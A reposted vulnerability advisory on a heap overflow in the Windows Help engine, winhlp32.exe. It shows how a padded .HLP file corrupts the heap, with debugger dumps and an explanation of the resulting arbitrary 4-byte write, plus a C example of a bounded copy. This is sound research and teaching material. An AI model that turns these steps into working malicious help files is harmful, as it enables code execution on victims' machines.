Microsoft Windows Help Image Processing Heap Overflow Vulnerability (copied online)

Source: Internet
Author: User

Copied from (http://hi.baidu.com/jymx6/blog/item/d609f2c4afb132a98326ac61.html); saved here to study when there is time.

Microsoft Windows Help Image Processing Heap Overflow Vulnerability

Affected Systems:

Microsoft Windows XP SP2
Microsoft Windows XP SP1
Microsoft Windows Server 2003 SP1
Microsoft Windows Server 2003
Microsoft Windows NT Server 4.0
Microsoft Windows 2000 SP4
Microsoft Windows 2000 SP3
Microsoft Windows 2000 SP2
Microsoft Windows 2000 SP1

Description:

--------------------------------------------------------------------------------

BugTraq ID: 17325

Microsoft Windows is a very popular operating system released by Microsoft.

The .HLP file rendering engine in winhlp32.exe has a heap overflow vulnerability. An attacker can embed HTML pages in a .HLP file to trigger it, overwrite adjacent heap memory, and execute arbitrary code.

Test method:

--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Use at your own risk!

Take acmsetup.HLP as an example. ASCII column of a hex dump of the original file (excerpt, with the macro string joined into one line):

...snip...
:CW('main'):FH():CBB('btn_topics','NS():JI('>main','helptopicsbutton'):FH():CS():FH():FD()'):SPC(1,16777215):FH().
...LP.....
...............
.Z.../..........
................
................
...W..X...
...5.'...%...e
%......3.@=......
...X..

// Attackers can inject malicious input to trigger this vulnerability:

...snip...
:CW('main'):FH():CBB('btn_topics','NS():JI('>main','helptopicsbutton'):FH():CS():FH():FD()'):SPC(1,16777215):FH().
...LP.....
...............
.Z.../..........
...AAAAAAA
AAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAA
plus 10,000 more

After winhlp32.exe opens the .HLP file, the heap state (with the debug heap checks enabled) is as follows:

HEAP[winhlp32.exe]: Heap block at 0009b940 modified at 0009b9a2 past requested size of 5a
0:000> dd 0009b940
0009b940  0005000f 001e0700 4f26001f 41697470
0009b950  41414141 abababab 41ababab feeefeee
0009b960  4100feee 41414141 00040000 41000005
0009b970  554d001b 41002928 41414141 feababab
0009b980  4100feee 00000000 41060000 41414141
0009b990  6f42001f 416d6b6f 65446b72 416e6966
0009b9a0  41414141 abababab 41ababab feeefeee
0009b9b0  4100feee 00004141 000f0006 feee0400
HEAP[winhlp32.exe]: Invalid address specified to RtlFreeHeap( 00090000, 0009b948 )
(728.2f8): Break instruction exception - code 80000003 (first chance)
eax=0009b940 ebx=0009b940 ecx=77f75c17 edx=0007ecba esi=00090000 edi=0009b940
eip=77f75a58 esp=0007eec4 ebp=0007eed8 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00000202
0:000> dd 0009b948
0009b948  4f26001f 41697470 41414141 abababab
0009b958  41ababab feeefeee 4100feee 41414141
0009b968  00040000 41000005 554d001b 41002928
0009b978  41414141 feababab 4100feee 00000000
0009b988  41060000 41414141 6f42001f 416d6b6f
0009b998  65446b72 416e6966 41414141 abababab
0009b9a8  41ababab feeefeee 4100feee 00004141
0009b9b8  000f0006 00230400 000901a8 000901a8
HEAP[winhlp32.exe]: Heap block at 0009be50 modified at 0009bf54 past requested size of fc
0:000> dd 0009be50
0009be50  00180023 001c0700 02390006 007a0000
0009be60  00000000 02b30000 00280000 000e0000
0009be70  000d0000 00010000 00000004 00000000
0009be80  00000000 005a0000 00100000 00000000
0009be90  00000000 00000000 80000080 80000000
0009bea0  00800080 00800000 80800080 41410000
0009beb0  41414141 41414141 41414141 41414141
0009bec0  41414141 41414141 41414141 41414141

It can be seen that the tail of the block at 0009be50 has been overwritten past its requested size of fc (the debugger flags the write at 0009bf54), and everything from that point on is attacker-controlled:

0:000> dd 0009bf54
0009bf54  41414141 41414141 41414141 41414141
0009bf64  41414141 41414141 41414141 41414141
0009bf74  41414141 41414141 41414141 41414141
0009bf84  41414141 41414141 41414141 41414141
0009bf94  41414141 41414141 41414141 41414141
0009bfa4  41414141 41414141 41414141 41414141
0009bfb4  41414141 41414141 41414141 41414141
0009bfc4  41414141 41414141 41414141 41414141

Because both linked-list pointers in the overwritten heap block's management structure are attacker-controlled, the heap manager's unlink on free turns into a write of 4 arbitrary bytes to an arbitrary address (note eax and ecx below when it faults inside ntdll):

EAX 41414141
ECX 41414141
EDX 0009e5d8 ASCII "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ..."
EBX 00090000
ESP 0007f90c
EBP 0007fb30
ESI 0009e5d8 ASCII "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ..."
EDI 00000068
EIP 77f581bd ntdll.77f581bd
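To make the debug-heap messages above concrete, here is an added example (not code from the original post or from winhlp32.exe) that models the tail fill the dd output shows as abababab, and puts the unchecked copy that trips the "modified past requested size" check beside a bounded copy that does not. The record layout ([u16 length][bytes]), the TAIL_BYTES constant and all function names are assumptions for illustration; the page does not document the real .HLP structure.

```c
#include <stdlib.h>
#include <string.h>

/* Models the debug heap's tail check: TAIL_BYTES of 0xAB are placed after the
 * requested size (the abababab fill visible in the dd output above), and
 * check_tail() reports where the fill was first clobbered, which is what the
 * "modified at ... past requested size of ..." message is derived from.      */
#define TAIL_BYTES 8
typedef struct { size_t requested; unsigned char *data; } dbg_block;

static dbg_block dbg_alloc(size_t requested) {
    dbg_block b = { requested, calloc(1, requested + TAIL_BYTES) };
    memset(b.data + requested, 0xAB, TAIL_BYTES);
    return b;
}

/* -1 when the tail is intact, otherwise the offset of the first changed byte. */
static long check_tail(const dbg_block *b) {
    for (size_t i = 0; i < TAIL_BYTES; i++)
        if (b->data[b->requested + i] != 0xAB) return (long)(b->requested + i);
    return -1;
}

/* Assumed record layout [u16 little-endian length][bytes]; the page does not
 * document the real .HLP structure, so this shape is for illustration only. */
static size_t copy_record_unchecked(dbg_block *dst, const unsigned char *rec) {
    size_t len = rec[0] | (rec[1] << 8);
    memcpy(dst->data, rec + 2, len);                 /* trusts the file's length */
    return len;
}

static size_t copy_record_checked(dbg_block *dst, const unsigned char *rec) {
    size_t len = rec[0] | (rec[1] << 8);
    if (len > dst->requested) len = dst->requested;  /* clamp to the allocation */
    memcpy(dst->data, rec + 2, len);
    return len;
}

/* Constructed input: a 0x5a-byte allocation (as in the first dump) fed a record
 * 4 bytes longer. The overrun lands inside the tail fill, so nothing outside
 * our own buffer is touched. Returns the offset check_tail() reports. */
static long run_copy(int checked) {
    unsigned char rec[2 + 0x5a + 4];
    rec[0] = 0x5a + 4; rec[1] = 0;
    memset(rec + 2, 'A', 0x5a + 4);
    dbg_block b = dbg_alloc(0x5a);
    if (checked) copy_record_checked(&b, rec); else copy_record_unchecked(&b, rec);
    long r = check_tail(&b);
    free(b.data);
    return r;
}
```

The unchecked copy is detected at offset 0x5a, exactly the "past requested size of 5a" boundary in the first dump, while the clamped copy leaves the tail intact.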

Suggestion:

--------------------------------------------------------------------------------

Vendor patch:

Microsoft

---------

Currently the vendor has not provided a patch or upgrade. Users of the software are advised to check the vendor's homepage for the latest version:

http://www.microsoft.com/technet/security/
